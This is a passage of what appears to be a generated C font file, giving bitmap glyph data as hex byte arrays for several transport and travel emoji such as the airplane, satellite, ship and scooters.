0xe0, 0x3c, 0x0, 0x0, 0x0, 0x1c, 0x0, 0xf,
0x0, 0x30, 0x7, 0x80, 0x0, 0x0, 0x3, 0x80,
0x3, 0xc0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0xe0, 0x1, 0xe0, 0x0, 0x0, 0x18, 0x0, 0x0,
0x0, 0x38, 0x0, 0x78, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x1e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x7, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0x7, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
/* U+1F6EB "🛫" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xf1, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xf0, 0x7f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x3c, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0xe, 0x3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xfc, 0x20,
0x80, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e,
0x4, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3f, 0x4, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0x80, 0x80, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xc1, 0x0, 0x0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x20, 0x0, 0x3c,
0x0, 0x0, 0x30, 0x0, 0x1, 0xf0, 0x4, 0x0,
0xf, 0xc, 0x0, 0xf, 0x0, 0x0, 0xf8, 0x8,
0x0, 0x7, 0xc1, 0xc0, 0x1, 0xf8, 0x0, 0x7c,
0x1, 0x0, 0x1, 0xe0, 0x38, 0x0, 0x1f, 0x80,
0x1f, 0x0, 0x0, 0x0, 0xff, 0xfe, 0x80, 0x3,
0xff, 0xff, 0xff, 0xff, 0x80, 0x7e, 0x7f, 0x18,
0x3, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x1f, 0xc7,
0x3, 0xff, 0xff, 0xff, 0xff, 0xf3, 0xf0, 0xf,
0xf8, 0x80, 0x7f, 0xff, 0xff, 0xff, 0xfe, 0x38,
0x7, 0xff, 0x10, 0xf, 0xff, 0xff, 0xff, 0xff,
0xc6, 0x3, 0xef, 0xfc, 0x0, 0x7f, 0xff, 0xff,
0xff, 0xf8, 0xc1, 0xf1, 0xff, 0x80, 0x0, 0x0,
0xf, 0x80, 0x3f, 0xb8, 0xf8, 0x1f, 0xe0, 0x0,
0x0, 0x3, 0xe0, 0x7, 0xfe, 0xfc, 0x3, 0xf0,
0x0, 0x0, 0x0, 0xf0, 0x40, 0x7f, 0xfe, 0x0,
0x38, 0x0, 0x0, 0x0, 0x3e, 0x8, 0xf, 0xff,
0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xc0, 0x0,
0x3f, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xf8,
0x0, 0x7f, 0x80, 0x0, 0x0, 0x0, 0x0, 0xf,
0xff, 0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e,
0x7, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xe3, 0xef, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0xff, 0xff, 0xe0, 0x3f, 0xff, 0xf8, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0x3c, 0x3f, 0xe3,
0xf0, 0x0, 0x0, 0x3, 0xff, 0xff, 0xfe, 0x3,
0xf8, 0x7, 0xe0, 0x0, 0x0, 0x7, 0xff, 0xff,
0xff, 0xf7, 0xf0, 0xe, 0x0, 0x0, 0x0, 0x1f,
0xff, 0xff, 0xf0, 0xf, 0xe, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xc0, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xf8, 0xff, 0x7, 0x80,
0x0, 0x0, 0x0, 0x0, 0x1, 0xfc, 0x1, 0x83,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
/* U+1F6EC "🛬" */
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0xe0,
0x0, 0x0, 0xc, 0x0, 0x0, 0x0, 0x1f, 0xfe,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x3, 0xff,
0xff, 0xc0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x33,
0xff, 0xff, 0xf0, 0x3, 0xe0, 0x0, 0x0, 0x3,
0x9f, 0xc1, 0xff, 0xfc, 0x7c, 0x0, 0x0, 0x3,
0xf8, 0x7f, 0x0, 0x3f, 0xff, 0xc0, 0x0, 0xf,
0xff, 0xe0, 0x3c, 0x0, 0x1f, 0xfc, 0x0, 0x0,
0xff, 0xff, 0x0, 0x0, 0x0, 0xf, 0xfc, 0x0,
0x0, 0x0, 0x3c, 0x0, 0x60, 0x0, 0xf, 0xf8,
0x0, 0x0, 0x1, 0xf0, 0x6, 0x60, 0x0, 0xf,
0xf0, 0x0, 0x0, 0x7, 0xc0, 0x6, 0x60, 0x0,
0x1f, 0xc0, 0x0, 0x0, 0x1f, 0x0, 0x6, 0x60,
0x0, 0x3e, 0x0, 0x0, 0x0, 0x7e, 0x10, 0x6,
0x60, 0x0, 0xf0, 0x0, 0x0, 0x1, 0xfb, 0xfc,
0x6, 0x0, 0x7, 0x0, 0x0, 0x0, 0x3, 0xff,
0xf8, 0x0, 0x0, 0x38, 0x0, 0x0, 0x1, 0xff,
0xff, 0xc0, 0x0, 0x3, 0xc0, 0x0, 0x3, 0xff,
0xff, 0xf0, 0x0, 0x1, 0xfe, 0x60, 0xf, 0xff,
0xff, 0xff, 0xe0, 0x0, 0x0, 0xf7, 0xff, 0xff,
0xff, 0xf0, 0x3f, 0xf0, 0x0, 0x7, 0x7f, 0xff,
0xff, 0xfe, 0x0, 0xff, 0xff, 0xe3, 0xf3, 0xff,
0xfd, 0xff, 0x30, 0xc, 0x1f, 0xff, 0xfe, 0x0,
0x0, 0x1f, 0xe3, 0x0, 0xc0, 0xe3, 0xff, 0x80,
0x0, 0x0, 0xfe, 0x30, 0xc, 0xe, 0x6, 0x0,
0x0, 0x0, 0x7, 0xe3, 0x1, 0xe0, 0x0, 0x60,
0x0, 0x0, 0x0, 0x1e, 0x30, 0x1e, 0x0, 0x6,
0x0, 0x0, 0x0, 0x0, 0x72, 0x0, 0xe0, 0x0,
0xf0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x7f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xe0, 0x3f, 0x80, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xf, 0xe0, 0x1f, 0xc0,
0x0, 0x0, 0x0, 0x1f, 0xf0, 0x0, 0xf, 0xff,
0xc0, 0x0, 0x0, 0x1f, 0x87, 0xf0, 0x3, 0xff,
0xff, 0xe0, 0x0, 0x3, 0xf8, 0x4, 0x1, 0xef,
0xff, 0xff, 0xf0, 0x0, 0x3, 0xf8, 0x0, 0xf0,
0x3f, 0xff, 0xff, 0xf0, 0x0, 0x3, 0xf0, 0x7f,
0xff, 0x7, 0xff, 0xfc, 0x0, 0x0, 0x7, 0xff,
0xff, 0xf1, 0xf3, 0xfe, 0x0, 0x0, 0x0, 0x7,
0xff, 0xff, 0xf8, 0xf, 0x80, 0x0, 0x0, 0x0,
0xf, 0xff, 0xff, 0xe7, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x40, 0x0, 0x0,
0x0,
/* U+1F6F0 "🛰" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7f, 0xc0, 0x0, 0x0, 0xc, 0x0, 0x0,
0x0, 0xe, 0xfe, 0x0, 0x0, 0x1, 0x80, 0x0,
0x0, 0x1, 0xc3, 0xf8, 0x0, 0x0, 0x7c, 0x1,
0x0, 0x0, 0x38, 0xf, 0xe0, 0x0, 0x7f, 0xf0,
0x78, 0x0, 0x7, 0x0, 0x3f, 0x80, 0x3f, 0xdf,
0xdf, 0x80, 0x0, 0xe0, 0x0, 0xfc, 0x1f, 0x98,
0x7f, 0xf0, 0x0, 0x1c, 0x0, 0x3, 0xff, 0xc7,
0x83, 0xff, 0x0, 0x3, 0x80, 0x0, 0xff, 0xe1,
0xf8, 0xf, 0xe0, 0x0, 0x70, 0x0, 0x3f, 0xe0,
0x3f, 0x80, 0xfc, 0x0, 0xe, 0x0, 0xf, 0xfe,
0x3, 0xe0, 0x1f, 0x80, 0x1, 0xc0, 0x7, 0xff,
0xf0, 0x0, 0x1, 0xf0, 0x0, 0x38, 0x1, 0xf0,
0x7f, 0x0, 0x0, 0x3e, 0x0, 0x7, 0x0, 0x7c,
0x7, 0xf0, 0x0, 0x7, 0x0, 0x0, 0xe0, 0x1f,
0x0, 0x7f, 0x0, 0x80, 0x60, 0x0, 0x1c, 0xf,
0xe0, 0x7, 0xf0, 0x1e, 0xe, 0x0, 0x3, 0xe3,
0xfc, 0x0, 0x7e, 0x3, 0xf1, 0xc0, 0x0, 0x7f,
0xff, 0x80, 0x7, 0xe0, 0x7f, 0xf8, 0x0, 0x1,
0xff, 0xf0, 0x0, 0xfc, 0xe, 0x7f, 0x0, 0x0,
0x7, 0xfe, 0x0, 0xf, 0xc1, 0xc1, 0xf8, 0x0,
0x0, 0x3f, 0xc0, 0x1, 0xf8, 0x38, 0xf, 0xe0,
0x0, 0x0, 0xf8, 0x0, 0x1f, 0x7, 0x0, 0x3f,
0x80, 0x0, 0x7, 0x1, 0x83, 0xf0, 0xe0, 0x0,
0xfe, 0x0, 0x0, 0xe0, 0xf0, 0x7e, 0x1c, 0x0,
0x7, 0xf0, 0x0, 0x1c, 0x7e, 0xf, 0xc3, 0x80,
0x0, 0x1f, 0x80, 0x1, 0xff, 0x0, 0xf8, 0x70,
0x0, 0x0, 0xf0, 0x0, 0x3f, 0x80, 0x1f, 0xe,
0x0, 0x0, 0x3e, 0x0, 0xf, 0xc0, 0x3, 0xe7,
0xc0, 0x0, 0xf, 0xc0, 0x7, 0xf0, 0x0, 0x7f,
0xf8, 0x0, 0x3, 0xf8, 0xf, 0xfe, 0x0, 0xf,
0xff, 0x0, 0x1, 0xff, 0x3, 0xf8, 0xe0, 0x1,
0xf8, 0xe0, 0x0, 0x7f, 0xe0, 0x7c, 0x1e, 0x0,
0x3c, 0x1c, 0x0, 0x1f, 0xfc, 0xf, 0x81, 0xc0,
0x7, 0x83, 0xc0, 0x7, 0xff, 0x80, 0xe0, 0x1c,
0x1, 0xf0, 0x7f, 0x3, 0xff, 0xf0, 0x0, 0x3,
0xc0, 0x3c, 0x3, 0xfc, 0xff, 0xfe, 0x0, 0x0,
0x3c, 0xf, 0x0, 0xf, 0xff, 0xff, 0xc0, 0x0,
0x3, 0xe1, 0xe0, 0x0, 0x3f, 0xff, 0xf8, 0x0,
0x0, 0x1f, 0xf0, 0x0, 0x1, 0xff, 0xff, 0x0,
0x0, 0x0, 0xfc, 0x0, 0x0, 0x7, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x40,
/* U+1F6F3 "🛳" */
0x0, 0x0, 0x0, 0x0, 0x30, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xff, 0xe0,
0x0, 0x7, 0x0, 0x0, 0x1c, 0x0, 0x3, 0xff,
0x0, 0x1, 0xf8, 0x0, 0x6, 0x0, 0x1, 0xff,
0xf8, 0x0, 0xfe, 0x0, 0x1, 0x80, 0x0, 0x7f,
0xfe, 0x0, 0x3e, 0x0, 0x0, 0x60, 0x0, 0xf,
0xff, 0x80, 0xf, 0x80, 0x0, 0x1c, 0x0, 0x1,
0xff, 0xe0, 0x7, 0xe0, 0x0, 0x3, 0xff, 0xff,
0xf7, 0xf8, 0x1, 0xf8, 0x0, 0x0, 0xff, 0xff,
0xfc, 0x6, 0x0, 0x7e, 0x0, 0x0, 0xc, 0x0,
0x7, 0x1, 0x80, 0x3f, 0x80, 0x0, 0x3, 0x0,
0x1, 0xc0, 0x7f, 0x8f, 0xe0, 0x0, 0x0, 0xc0,
0x0, 0x60, 0x1f, 0xff, 0xf8, 0x0, 0x0, 0x70,
0xfe, 0x18, 0x47, 0x1f, 0xff, 0x80, 0x0, 0x1c,
0x7f, 0x86, 0x39, 0xce, 0x7f, 0xe0, 0x0, 0x7,
0x1f, 0xe3, 0x8e, 0x73, 0x9c, 0x18, 0x0, 0x1,
0x87, 0xf8, 0xe0, 0x1c, 0xe7, 0x6, 0x0, 0x0,
0x60, 0x0, 0x38, 0x0, 0x39, 0xc1, 0x80, 0x0,
0x38, 0x0, 0xe, 0x0, 0x0, 0x0, 0x60, 0x0,
0xe, 0x0, 0x3, 0xff, 0x80, 0x0, 0x18, 0x0,
0x3, 0x80, 0x0, 0xff, 0xff, 0xf8, 0x7, 0x80,
0x0, 0xc3, 0xfc, 0x38, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x30, 0xff, 0xe, 0x19, 0xcf, 0xff, 0xff,
0x0, 0xc, 0x3f, 0xc3, 0x6, 0x73, 0x9d, 0xff,
0xc0, 0x7, 0x1f, 0xf0, 0xc1, 0x9c, 0xe7, 0x38,
0x70, 0x1, 0xc0, 0x0, 0x70, 0x27, 0x39, 0xce,
0x1c, 0x0, 0x60, 0x0, 0x1c, 0x0, 0x2, 0x73,
0x87, 0x0, 0x18, 0x0, 0x7, 0x0, 0x0, 0x0,
0x1, 0xcf, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x73, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x0, 0x1c, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x7, 0x18, 0x0, 0x0, 0x1e, 0x0, 0xff,
0xff, 0xf1, 0xc6, 0x0, 0x0, 0x1, 0xc0, 0x0,
0xf, 0xff, 0xf1, 0xc1, 0x80, 0x0, 0x30, 0x0,
0x0, 0xf, 0xff, 0x70, 0xf1, 0xe3, 0x8e, 0x0,
0x0, 0x3, 0x7, 0xdc, 0x3c, 0x78, 0xe1, 0x80,
0x0, 0x1, 0x80, 0x37, 0xf, 0x1e, 0x38, 0x7f,
0x0, 0x0, 0xc0, 0xc, 0xc0, 0x0, 0x4, 0xf,
0xff, 0xf0, 0x70, 0xc3, 0x30, 0x0, 0x0, 0x0,
0x7f, 0xff, 0xf8, 0x70, 0xcc, 0x0, 0x0, 0x0,
0x0, 0x7, 0xfc, 0xc, 0x33, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc, 0xff, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x3, 0x3f, 0xff, 0xff,
0xff, 0xf0, 0x0, 0x0, 0x0, 0xcf, 0xff, 0xff,
0xff, 0xff, 0xff, 0x0, 0x0, 0x31, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0xc, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x81,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6F4 "🛴" */
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe3, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xff, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc1, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x1,
0xff, 0x83, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x3,
0xff, 0x7, 0xff, 0xc0, 0x0, 0x0, 0x0, 0xf,
0xfe, 0x7, 0xff, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xfc, 0xc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xfe, 0x78, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0x1c, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30,
0x39, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x63, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xcc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0x98, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x6,
0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x31,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x4, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x61, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x2, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x60, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x31, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x63, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6, 0x18, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc, 0x30, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x18, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x21, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x41, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0x83, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x6, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x8, 0x3, 0x80, 0x0, 0x0,
0x0, 0x7f, 0x0, 0x10, 0x83, 0x80, 0x0, 0x0,
0x3, 0xff, 0x80, 0x60, 0x87, 0x0, 0x0, 0x0,
0x1e, 0x7, 0xc0, 0xc3, 0x87, 0x0, 0x0, 0x0,
0x70, 0x1, 0x83, 0x87, 0x87, 0x0, 0x0, 0x1,
0xc0, 0x3, 0x6, 0xf, 0x7, 0x0, 0x0, 0x3,
0x0, 0x6, 0x18, 0xf, 0xf, 0x0, 0x0, 0xe,
0xf, 0xfc, 0x36, 0x1f, 0xe, 0x0, 0x0, 0x18,
0x3f, 0xf8, 0x7c, 0x37, 0xf, 0xff, 0xff, 0xf0,
0xe0, 0x1, 0xf0, 0x6f, 0xf, 0xff, 0xff, 0xff,
0xfc, 0x7, 0xe1, 0xce, 0xe, 0x0, 0x1, 0xff,
0xfe, 0xf, 0xc3, 0xde, 0x1e, 0x0, 0x0, 0xf,
0xfe, 0x3f, 0x87, 0x9e, 0xf, 0xff, 0xff, 0xff,
0x3c, 0x7b, 0x1f, 0x1e, 0xf, 0xff, 0xff, 0xff,
0x3c, 0xf3, 0x3e, 0x3e, 0x0, 0x0, 0x0, 0x3,
0x39, 0xe7, 0xdc, 0x3e, 0x0, 0x0, 0x0, 0x6,
0x73, 0xc7, 0x38, 0x3f, 0x0, 0x0, 0x0, 0x1c,
0xe3, 0xc0, 0xf0, 0x3f, 0xff, 0xff, 0xff, 0xf1,
0xc7, 0xc3, 0xc0, 0x0, 0xff, 0xff, 0xff, 0x87,
0x7, 0xff, 0x0, 0x0, 0x0, 0x0, 0xf, 0xfe,
0x7, 0xfc, 0x0, 0x0, 0x0, 0x0, 0xf, 0xf8,
0x3, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xc0,
/* U+1F6F5 "🛵" */
0x0, 0x0, 0x0, 0x3, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x63, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x18, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x18, 0xc0, 0x7f, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x6e, 0x3, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x1, 0xfc, 0x1e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf9, 0xe0, 0x0, 0x0,
